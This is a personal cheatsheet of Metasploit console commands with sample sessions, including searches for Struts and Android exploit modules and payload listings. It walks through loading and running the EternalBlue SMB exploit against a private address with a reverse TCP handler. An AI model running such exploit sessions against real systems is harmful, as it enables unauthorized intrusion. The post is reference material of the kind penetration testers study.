Metasploit Console: my own cheatsheet
Metasploit Framework is an invaluable open-source tool for developing and executing exploit code against a remote target machine.
Its main administrative interface, the Metasploit console (msfconsole), offers many different commands to choose from.
Here is my own set (in alphabetical order) of the main msfconsole commands, each with a brief reference.
back
Once you have finished working with a particular module use the back command to move out of the current context.
msf exploit(multi/http/struts2_content_type_ognl) > back
msf >
check
Checks whether a target is vulnerable (not supported by all exploit modules).
msf exploit(multi/http/struts2_content_type_ognl) > check
[*] www.xxxxxx.org:8080 The target is not exploitable.
color
Enable or disable color output of msfconsole.
msf > color
Usage: color <'true'|'false'|'auto'>

Enable or disable color output.
connect
Netcat-like command built into the msfconsole.
msf > connect 192.168.1.1 80
[*] Connected to 192.168.1.1:80
HTTP/1.0 400 Bad Request
Content-Type: text/html
X-Frame-Options: SAMEORIGIN
Date: Tue, 05 Dec 2017 14:12:13 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Accept-Ranges: bytes
Connection: close

<html>
<head>
<title>400 Bad Request</title>
</head>
<body bgcolor="#ffffff">
<h2>400 Bad Request</h2>
<p></p>
</body>
</html>
msf >
edit
Edit the current module in Vim.
msf exploit(windows/smb/ms17_010_eternalblue) > edit
[!] LocalEditor or $VISUAL/$EDITOR should be set. Falling back on vim.
[*] Launching vim /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb
exit
Exit msfconsole.
msf exploit(windows/smb/ms17_010_eternalblue) > exit
andrea@lucille:~$
exploit (run)
Starts the current exploit.
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.6:4444
[*] 192.168.1.1:445 - Connecting to target for exploitation.
grep
Similar to Linux grep: it matches a given pattern in the output of another msfconsole command.
msf > grep
Usage: grep [options] pattern cmd

Grep the results of a console command (similar to Linux grep command)

OPTIONS:

    -A <opt>  Show arg lines of output After a match.
    -B <opt>  Show arg lines of output Before a match.
    -c        Only print a count of matching lines.
    -h        Help banner.
    -i        Ignore case.
    -k <opt>  Keep (include) arg lines at start of output.
    -m <opt>  Stop after arg matches.
    -s <opt>  Skip arg lines of output before attempting match.
    -v        Invert match.
help
Returns a list of all available commands, each with a short description.
msf > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
info
Provides detailed information about a particular module including all options, targets, and other information.
msf > info exploit/windows/smb/ms17_010_eternalblue

       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14

Provided by:
  Sean Dillon <sean.dillon@risksense.com>
  Dylan Davis <dylan.davis@risksense.com>
  Equation Group
  Shadow Brokers
  thelightcosine

Available targets:
  Id  Name
  --  ----
  0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Basic options:
  ...
irb
Opens a live Ruby interpreter (IRB) shell.
msf > irb
[*] Starting IRB shell...

>> puts "Test!"
Test!
jobs
Provides the ability to list and terminate background jobs.
msf > jobs -h
Usage: jobs [options]

Active job manipulation and interaction.

OPTIONS:

    -K        Terminate all running jobs.
    -h        Help banner.
    -i <opt>  Lists detailed information about a running job.
    -k <opt>  Terminate the specified job name.
    -l        List all running jobs.
    -v        Print more detailed info.  Use with -i and -l

msf >
kill
Kills a running job, identified by its job id.
msf exploit(windows/smb/ms17_010_eternalblue) > kill 0
Stopping job: 0...
load
Loads a plugin from Metasploit’s plugin directory.
msf > load
Usage: load <path> [var=val var=val ...]

Loads a plugin from the supplied path.  For a list of built-in plugins,
do: load -l.  The optional var=val options are custom parameters that
can be passed to plugins.
loadpath
Loads a third-party module tree.
msf > loadpath /home/andrea/modules
Loaded 0 modules.
unload
Unloads a previously loaded plugin and removes any extended commands.
msf > unload pcap_log
Unloading plugin pcap_log...unloaded.
resource
Runs a resource file: a file of msfconsole commands that is replayed as if typed at the prompt.
msf > resource
Usage: resource path1 [path2 ...]

Run the commands stored in the supplied files.  Resource files may also contain
ruby code between <ruby> tags.

See also: makerc
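As an added example (not from the original post), the following resource file mixes plain msfconsole commands with a <ruby> block that refuses to run the check when RHOST is empty; the file name, the target address and the port are constructed placeholders:

```text
# vuln-check.rc (constructed example; run it with "resource vuln-check.rc"
# inside msfconsole, or from the shell with "msfconsole -r vuln-check.rc")
# Plain lines are ordinary msfconsole commands, exactly as typed at the prompt.
setg LHOST 192.168.1.6
use exploit/multi/http/struts2_content_type_ognl
set RHOST 192.168.1.1
set RPORT 8080

<ruby>
# Everything between <ruby> tags is Ruby evaluated in the console's own
# context, so active_module, run_single and print_* are available here.
mod = active_module
target = mod.datastore['RHOST'].to_s
if target.empty?
  print_error("RHOST is not set; skipping the check")
else
  print_status("Running check for #{mod.fullname} against #{target}")
  # "check" only tests whether the target is vulnerable; it does not exploit it
  run_single("check")
end
</ruby>
```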
search
Regular-expression based search (note that Metasploit module names use underscores rather than hyphens).
msf > search struts

Matching Modules
================

   Name                                                     Disclosure Date  Rank       Description
   ----                                                     ---------------  ----       -----------
   exploit/multi/http/struts2_content_type_ognl             2017-03-07       excellent  Apache Struts Jakarta Multipart Parser OGNL Injection
   exploit/multi/http/struts2_rest_xstream                  2017-09-05       excellent  Apache Struts 2 REST Plugin XStream RCE
   exploit/multi/http/struts_code_exec                      2010-07-13       good       Apache Struts Remote Command Execution
   exploit/multi/http/struts_code_exec_classloader          2014-03-06       manual     Apache Struts ClassLoader Manipulation Remote Code Execution
   exploit/multi/http/struts_code_exec_exception_delegator  2012-01-06       excellent  Apache Struts Remote Command Execution
Searches can be refined by using a built-in keyword system:
msf > help search
Usage: search [keywords]

Keywords:
  app       :  Modules that are client or server attacks
  author    :  Modules written by this author
  bid       :  Modules with a matching Bugtraq ID
  cve       :  Modules with a matching CVE ID
  edb       :  Modules with a matching Exploit-DB ID
  name      :  Modules with a matching descriptive name
  platform  :  Modules affecting this platform
  ref       :  Modules with a matching ref
  type      :  Modules of a specific type (exploit, auxiliary, or post)

Examples:
  search cve:2009 type:exploit app:client
name
Search using a descriptive name.
msf > search name:struts

Matching Modules
================

   Name                                                     Disclosure Date  Rank       Description
   ----                                                     ---------------  ----       -----------
   exploit/multi/http/struts2_content_type_ognl             2017-03-07       excellent  Apache Struts Jakarta Multipart Parser OGNL Injection
   exploit/multi/http/struts2_rest_xstream                  2017-09-05       excellent  Apache Struts 2 REST Plugin XStream RCE
   exploit/multi/http/struts_code_exec                      2010-07-13       good       Apache Struts Remote Command Execution
   exploit/multi/http/struts_code_exec_classloader          2014-03-06       manual     Apache Struts ClassLoader Manipulation Remote Code Execution
   exploit/multi/http/struts_code_exec_exception_delegator  2012-01-06       excellent  Apache Struts Remote Command Execution
platform
Searches for modules that affect a specific platform.
msf > search platform:android

Matching Modules
================

   Name                                                      Disclosure Date  Rank       Description
   ----                                                      ---------------  ----       -----------
   exploit/android/browser/samsung_knox_smdm_url             2014-11-12       excellent  Samsung Galaxy KNOX Android Browser RCE
   exploit/android/browser/stagefright_mp4_tx3g_64bit        2015-08-13       normal     Android Stagefright MP4 tx3g Integer Overflow
   exploit/android/browser/webview_addjavascriptinterface    2012-12-21       excellent  Android Browser and WebView addJavascriptInterface Code Execution
   exploit/android/fileformat/adobe_reader_pdf_js_interface  2014-04-13       good       Adobe Reader for Android addJavascriptInterface Exploit
   exploit/android/local/futex_requeue                       2014-05-03       excellent  Android 'Towelroot' Futex Requeue Kernel Exploit
   exploit/android/local/put_user_vroot                      2013-09-06       excellent  Android get_user/put_user Exploit
   exploit/multi/handler                                                      manual     Generic Payload Handler
   exploit/multi/local/allwinner_backdoor                    2016-04-30       excellent  Allwinner 3.4 Legacy Kernel Local Privilege Escalation
   payload/android/meterpreter/reverse_http                                   normal     Android Meterpreter, Android Reverse HTTP Stager
   payload/android/meterpreter/reverse_https                                  normal     Android Meterpreter, Android Reverse HTTPS Stager
   payload/android/meterpreter/reverse_tcp                                    normal     Android Meterpreter, Android Reverse TCP Stager
   payload/android/meterpreter_reverse_http                                   normal     Android Meterpreter Shell, Reverse HTTP Inline
   payload/android/meterpreter_reverse_https                                  normal     Android Meterpreter Shell, Reverse HTTPS Inline
   payload/android/meterpreter_reverse_tcp                                    normal     Android Meterpreter Shell, Reverse TCP Inline
author
Searches for modules by a specific author.
msf > search author:rapid7

Matching Modules
================

   Name                                               Disclosure Date  Rank    Description
   ----                                               ---------------  ----    -----------
   auxiliary/admin/atg/atg_client                                      normal  Veeder-Root Automatic Tank Gauge (ATG) Administrative Client
   auxiliary/admin/cisco/cisco_asa_extrabacon                          normal  Cisco ASA Authentication Bypass (EXTRABACON)
   auxiliary/admin/dns/dyn_dns_update                                  normal  DNS Server Dynamic Update Record Injection
   auxiliary/admin/http/allegro_rompager_auth_bypass  2014-12-17       normal  Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass
   auxiliary/admin/upnp/soap_portmapping                               normal  UPnP IGD SOAP Port Mapping Utility
   auxiliary/dos/http/slowloris                       2009-06-17       normal  Slowloris Denial of Service Attack
   auxiliary/dos/misc/ibm_tsm_dos                     2015-12-15       normal  IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service
Keywords can also be combined to further narrow down the returned results:
msf > search type:exploit name:struts cve:2017

Matching Modules
================

   Name                                          Disclosure Date  Rank       Description
   ----                                          ---------------  ----       -----------
   exploit/multi/http/struts2_content_type_ognl  2017-03-07       excellent  Apache Struts Jakarta Multipart Parser OGNL Injection
   exploit/multi/http/struts2_rest_xstream       2017-09-05       excellent  Apache Struts 2 REST Plugin XStream RCE
sessions
Lists, interacts with, and kills spawned sessions.
msf > sessions -h
Usage: sessions [options] or sessions [id]

Active session manipulation and interaction.

OPTIONS:

    -C <opt>  Run a Meterpreter Command on the session given with -i, or all
    -K        Terminate all sessions
    -c <opt>  Run a command on the session given with -i, or all
    -h        Help banner
    -i <opt>  Interact with the supplied session ID
    -k <opt>  Terminate sessions by session ID and/or range
    -l        List all active sessions
    -q        Quiet mode
    -r        Reset the ring buffer for the session given with -i, or all
    -s <opt>  Run a script on the session given with -i, or all
    -t <opt>  Set a response timeout (default: 15)
    -u <opt>  Upgrade a shell to a meterpreter session on many platforms
    -v        List sessions in verbose mode
    -x        Show extended information in the session table

Many options allow specifying session ranges using commas and dashes.
For example:
  sessions -s checkvm -i 1,3-5
  or
  sessions -k 1-2,5,6
set
Set framework options and parameters for the current module.
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.1.1      yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
unset
Removes a parameter previously configured with set (unset all removes every assigned variable).
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(windows/smb/ms17_010_eternalblue) > unset rhost
Unsetting rhost...
setg
Sets a global variable within msfconsole. The current environment can be saved with the save command.
msf > setg LHOST 192.168.1.6
LHOST => 192.168.1.6
msf > setg RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf > save
Saved configuration to: /home/andrea/.msf4/config
show
Shows every module within Metasploit.
msf > show

Encoders
========

   Name               Disclosure Date  Rank    Description
   ----               ---------------  ----    -----------
   cmd/generic_sh                      good    Generic Shell Variable Substitution Command Encoder
   cmd/ifs                             low     Generic ${IFS} Substitution Command Encoder
   cmd/printf_php_mq                   manual  printf(1) via PHP magic_quotes Utility Command Encoder
auxiliary
Display a list of all of the available auxiliary modules.
msf > show auxiliary

Auxiliary
=========

   Name                             Disclosure Date  Rank    Description
   ----                             ---------------  ----    -----------
   admin/2wire/xslt_password_reset  2007-08-15       normal  2Wire Cross-Site Request Forgery Password Reset Vulnerability
   admin/backupexec/dump                             normal  Veritas Backup Exec Windows Remote File Access
   admin/backupexec/registry                         normal  Veritas Backup Exec Server Registry Access
exploits
Returns a list of all exploits contained in the framework.
msf > show exploits

Exploits
========

   Name                              Disclosure Date  Rank   Description
   ----                              ---------------  ----   -----------
   aix/rpc_cmsd_opcode21             2009-10-07       great  AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
   aix/rpc_ttdbserverd_realpath      2009-06-17       great  ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
   bsdi/softcart/mercantec_softcart  2004-08-19       great  Mercantec SoftCart CGI Overflow
payloads
show payloads will display all of the different payloads available.
msf > show payloads

Payloads
========

   Name                     Disclosure Date  Rank    Description
   ----                     ---------------  ----    -----------
   aix/ppc/shell_bind_tcp                    normal  AIX Command Shell, Bind TCP Inline
   aix/ppc/shell_find_port                   normal  AIX Command Shell, Find Port Inline
   aix/ppc/shell_interact                    normal  AIX execve shell for inetd
In the context of a particular exploit, show payloads will only display the payloads that are compatible with that particular exploit.
msf exploit(windows/smb/ms17_010_eternalblue) > show payloads

Compatible Payloads
===================

   Name                                        Disclosure Date  Rank    Description
   ----                                        ---------------  ----    -----------
   generic/custom                                               normal  Custom Payload
   generic/shell_bind_tcp                                       normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                    normal  Generic Command Shell, Reverse TCP Inline
   windows/x64/exec                                             normal  Windows x64 Execute Command
   windows/x64/loadlibrary                                      normal  Windows x64 LoadLibrary Path
   windows/x64/meterpreter/bind_ipv6_tcp                        normal  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   windows/x64/meterpreter/bind_ipv6_tcp_uuid                   normal  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
targets
Within the context of an exploit module show targets returns which targets are supported.
msf exploit(windows/smb/ms17_010_eternalblue) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
advanced
Displays the advanced options of the current module.
msf exploit(windows/smb/ms17_010_eternalblue) > show advanced

Module advanced options (exploit/windows/smb/ms17_010_eternalblue):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL3, TLS1, TLS1.1, TLS1.2, SSL23)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                0                no        Additional delay when waiting for a session
encoders
Display a listing of the encoders that are available within MSF.
msf > show encoders

Compatible Encoders
===================

   Name               Disclosure Date  Rank    Description
   ----               ---------------  ----    -----------
   cmd/generic_sh                      good    Generic Shell Variable Substitution Command Encoder
   cmd/ifs                             low     Generic ${IFS} Substitution Command Encoder
   cmd/printf_php_mq                   manual  printf(1) via PHP magic_quotes Utility Command Encoder
   generic/none                        normal  The "none" Encoder
   mipsbe/longxor                      normal  XOR Encoder
   mipsle/longxor                      normal  XOR Encoder
   php/base64                          great   PHP Base64 encoder
   ppc/longxor                         normal  PPC LongXOR Encoder
   ppc/longxor_tag                     normal  PPC LongXOR Encoder
   sparc/longxor_tag                   normal  SPARC DWORD XOR Encoder
nops
Display the available NOP Generators.
msf > show nops

NOP Generators
==============

   Name             Disclosure Date  Rank    Description
   ----             ---------------  ----    -----------
   armle/simple                      normal  Simple
   mipsbe/better                     normal  Better
   php/generic                       normal  PHP Nop Generator
   ppc/simple                        normal  Simple
   sparc/random                      normal  SPARC NOP Generator
   tty/generic                       normal  TTY Nop Generator
   x64/simple                        normal  Simple
   x86/opty2                         normal  Opty2
   x86/single_byte                   normal  Single Byte
use
Selects a module to work with; the prompt changes to reflect the active module.
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > show info

       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14

Provided by:
  Sean Dillon <sean.dillon@risksense.com>
  Dylan Davis <dylan.davis@risksense.com>
  Equation Group
  Shadow Brokers
  thelightcosine